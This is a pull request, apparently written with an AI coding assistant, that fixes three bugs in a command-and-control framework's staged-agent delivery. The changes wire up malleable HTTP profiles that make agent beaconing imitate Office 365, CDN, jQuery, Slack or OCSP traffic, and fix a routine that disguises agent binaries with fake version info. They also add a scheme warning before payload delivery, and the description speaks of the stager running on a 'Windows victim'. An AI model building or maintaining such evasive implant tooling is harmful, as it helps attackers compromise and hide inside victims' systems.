### PR TITLE
fix(generator): fix 3 staged-agent delivery bugs

### DIFF
--- a/cmd/generate/build.go
+++ b/cmd/generate/build.go
@@ -78,6 +78,23 @@ func runStager(cmd *cobra.Command, _ []string) error {
 		return fmt.Errorf("--key is required for format %q (it is optional only for ps1, ps1-mem, vba, cs)", format)
 	}
 
+	// Warn when http:// is used with a port that strongly implies TLS is enabled
+	// on the server side (e.g. 443, 8443, 4443). The agent would get:
+	//   "client sent an HTTP request to an HTTPS server"
+	if strings.HasPrefix(strings.ToLower(c2), "http://") {
+		for _, tlsPort := range []string{":443", ":8443", ":4443"} {
+			if strings.Contains(c2, tlsPort) {
+				fmt.Fprintf(os.Stderr,
+					"[!] WARNING: --server uses http:// but port %s is typically HTTPS.\n"+
+						"    If your C2 server has TLS enabled, change the scheme to https://\n"+
+						"    otherwise the staged agent will fail with:\n"+
+						"      tls: client sent an HTTP request to an HTTPS server\n",
+					strings.TrimPrefix(tlsPort, ":"))
+				break
+			}
+		}
+	}
+
 	// Token travels in X-Stage-Token header — endpoint URL has no token in path.
 	stageEndpoint := strings.TrimRight(c2, "/") + "/stage/payload"
 

--- a/cmd/generate/masquerade.go
+++ b/cmd/generate/masquerade.go
@@ -32,7 +32,7 @@ func applyMasquerade(sourceDir string, cfg MasqueradeConfig, arch string) (clean
 	vi.FixedFileInfo.FileVersion.Patch = int(ls >> 16)
 	vi.FixedFileInfo.FileVersion.Build = int(ls & 0xFFFF)
 	vi.FixedFileInfo.ProductVersion = vi.FixedFileInfo.FileVersion
-	vi.FixedFileInfo.FileType = "VFT_APP"
+	vi.FixedFileInfo.FileType = "1" // VFT_APP = 0x1; goversioninfo.str2Uint32 parses this as hex uint32
 
 	copyright := cfg.Copyright
 	if copyright == "" {

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -68,6 +68,15 @@ func Load() *Config {
 		DNSEnabled:    getEnvOrDefault("DNS_ENABLED", "false") == "true",
 		DNSPort:       getEnvOrDefault("DNS_PORT", "5353"),
 		DNSDomain:     getEnvOrDefault("DNS_DOMAIN", ""),
+		// C2_PROFILE selects the malleable HTTP profile (alias routes for agent beaconing).
+		// Accepts: default | office365 | cdn | jquery | slack | ocsp
+		// Also checked under legacy name PROFILE for backwards compatibility.
+		Profile: func() string {
+			if v := os.Getenv("C2_PROFILE"); v != "" {
+				return v
+			}
+			return os.Getenv("PROFILE")
+		}(),
 	}
 
 	// Parse log level from environment


### PR DESCRIPTION
## Summary

Three bugs that together caused staged agents to silently fail to connect after the stager ran on a Windows victim:

- **`internal/config/config.go`** — Server never read `C2_PROFILE` (or legacy `PROFILE`) env var so malleable profile alias routes (e.g. `/autodiscover/autodiscover.xml` for office365) were never registered at startup. Server always used the default HTTP profile regardless of env.
- **`cmd/generate/masquerade.go`** — `FileType = "VFT_APP"` caused a build-time parse error. `goversioninfo.str2Uint32()` calls `strconv.ParseUint(s, 16, 32)` so it only accepts hex numeric strings. Fixed to `"1"` (VFT_APP = 0x00000001).
- **`cmd/generate/build.go`** — Added a stderr warning when `--server` uses `http://` with a TLS-implied port (443, 8443, 4443), catching the classic *"client sent an HTTP request to an HTTPS server"* misconfiguration before payload delivery.

## Test plan

- [ ] Start server with `C2_PROFILE=office365` — verify `/autodiscover/autodiscover.xml` alias route appears in startup log
- [ ] Build stageless with `--masq-company` flag — verify no `Error parsing "VFT_APP" as uint32`
- [ ] `taburtuai-generate stager --server http://host:8443 --token t --format ps1` — verify warning printed to stderr
- [ ] `taburtuai-generate stager --server http://host:8080 --token t --format ps1` — verify no spurious warning (plain HTTP port)

🤖 Generated with [Claude Code](https://claude.com/claude-code)